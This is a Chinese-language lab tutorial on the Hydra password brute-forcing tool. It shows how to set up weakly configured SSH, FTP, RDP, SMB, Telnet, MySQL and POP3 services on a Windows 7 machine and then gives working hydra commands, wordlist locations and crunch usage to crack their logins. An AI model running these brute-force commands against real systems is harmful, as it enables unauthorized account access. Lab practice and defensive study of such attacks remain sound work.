hydra暴力破解工具使用
hydra简介
hydra是著名黑客组织thc的一款开源暴力破解密码工具,功能非常强大,kali下默认安装,几乎支持所有协议的在线破解,密码能否破解,在于字典的强大。
hydra参数讲解
|
使用方法:hydra <参数><地址><服务名>
暴破ssh
hydra -L user.txt -P pass.txt -t 5 -vV -e ns -f IP地址 ssh
我们使用win7做演示首先我们需要打开win7的ssh服务,首先从官网下载openssh软件包https://github.com/PowerShell/Win32-OpenSSH/releases然后解压添加环境变量
成功安装
然后配置服务端进入解压目录
安装sshd服务powershell.exe -Executionpolicy Bypass -File install-sshd.ps1
开放22号端口如果关闭了防火前可以不执行netsh advfirewall firewall add rule name=sshd dir=in action=allow protocol=TCP localport=22
配置开机自启动sshd服务sc config ssht start= auto
开启服务net start sshd
默认的sshd配置文件在c:\programdata\ssh目录下(为隐藏目录)
修改配置文件
端口号:Port 22
密钥访问:PubkeyAuthentication yes
密码访问:PasswordAuthentication no
空密码:PermitEmptyPasswords no
我们把空密码连接打开重启服务尝试本地连接和远程连接发现无法连接
这里只需要禁用以下选项即可
就可以进行本地和远程空密码连接了
正式进行暴破
在这里我们需要注意登录ssh的账户是电脑中的账户,电脑中的账户密码修改则登录密码也修改,通过使用ssh 用户名@地址 -p 服务端端口号
指定用户登录
另一种登录方式创建密钥登录更安全在客户端生成密钥将公钥传输给服务器然后连接。
生成密钥
|
将公钥上传到服务端
将公钥内容拼接到对应用户目录下的authorized_keys文件内,文件不存在时手动创建cat id_rsa.pub >> .ssh/authorized_keys·
并赋予权限,设置服务端配置文件允许密钥连接登录
|
客户端登录方式:
在命令行中指定私钥:
ssh 用户名@地址 -i ~/.ssh/id_rsa_server
使用ssh-agent代理
|
- 在ssh配置中指定私钥文件
|
暴破ftp 端口号21和20
hydra ip ftp -L 用户名 -P密码字典 -e ns -vV
win7打开ftp服务
然后创建ftp用户和密码,计算机右键管理项在本地用户和组下的分栏右键点击用户,选择新建用户,在文字栏输入用户名和密码,确认后点击页面下方的创建。
然后在C盘创建ftp上传和下载目录
配置ftp服务器,创建上传和下载服务
创建上传服务器:
打开iis
创建ftp上传服务器
创建ftp下载服务器
我们测试一下出现如下错误,如果无法访问到这里是防火墙规则的原因我们就简单关闭防火墙
解决方法修改我们创建的ftp用户的全名和重命名
成功访问
我们用kali连接一下
我们使用hydra暴破ftp服务
防火墙开启ftp服务netsh advfirewall firewall add rule name=ftp dir=in action=allow protocol=TCP localport=21
这里也可以使用phpstudy直接一键启动搭建ftp服务
爆破远程连接3389端口
利用hydra暴破3389远程连接使用的rdp协议命令hydra -L user.txt -P pass.txt -t 5 -e n -vV 192.168.23.128(地址) rdp(协议)
win7远程连接其他电脑命令mstsc
win7配置远程桌面连接命令sysdm.cpl打开配置
配置允许空密码登录设置secpol.msc安全选项配置
我们可以使用rdesktop远程连接windows电脑
正式暴破
可以看到成功了,这里是用电脑中已存在的账号登录。
暴破smb服务
首先打开控制面板打开网络共享服务进行配置
smb服务的端口号137、138、139、445可能打开
我们来使用hydra进行暴破
然后就可以使用net use映射c盘进行利用
暴破telnet服务
首先win7打开telnet服务win+R输入optionalfeatures打开telnet服务
启动服务services.msc
暴破用户名和密码默认win7登录的用户名和密码
可以进行telnet连接利用
暴破数据库以mysql为例其他数据库可以更换数据库名字
首先开启允许数据库远程连接
设置防火墙允许3306通过netsh advfirewall firewall add rule name=mysql dir=in action=allow protocol=TCP localport=3306
尝试暴破
成功暴破进行远程连接mysql -h 192.168.23.128 -P 3306 -u root -proot
暴破pop3邮箱协议
hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3
解决字典问题
kali自带字典文件位置:/usr/share/wordlists/
dirb目录下字典
|
dirbuster目录下字典
|
字典生成工具crunch
生成字典的基本指令:crunch 最小位数 最大位数 指定生成范围
输出到特定文件位置:crunch 3 4 100 >>指定的文件
总结
hydra可破解的协议有很多
|
主要看字典是否强大和后续的利用。